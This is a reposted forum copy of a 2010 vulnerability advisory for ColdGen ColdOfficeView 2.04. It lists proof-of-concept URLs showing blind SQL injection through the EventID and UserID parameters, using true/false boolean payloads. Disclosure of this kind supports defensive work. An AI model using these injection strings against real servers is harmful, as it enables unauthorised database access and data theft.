首页
社区
课程
招聘
[转帖]ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities
发表于: 2010-9-9 10:47 1866

[转帖]ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities

2010-9-9 10:47
1866
# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities  

# Vendor: http://www.coldgen.com/  

# Found by: mr_me (net-ninja.net)  

   

PoC's  

1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]  

http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true  

http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false  

   

2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]  

http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true  

http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false

[课程]Android-CTF解题方法汇总!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//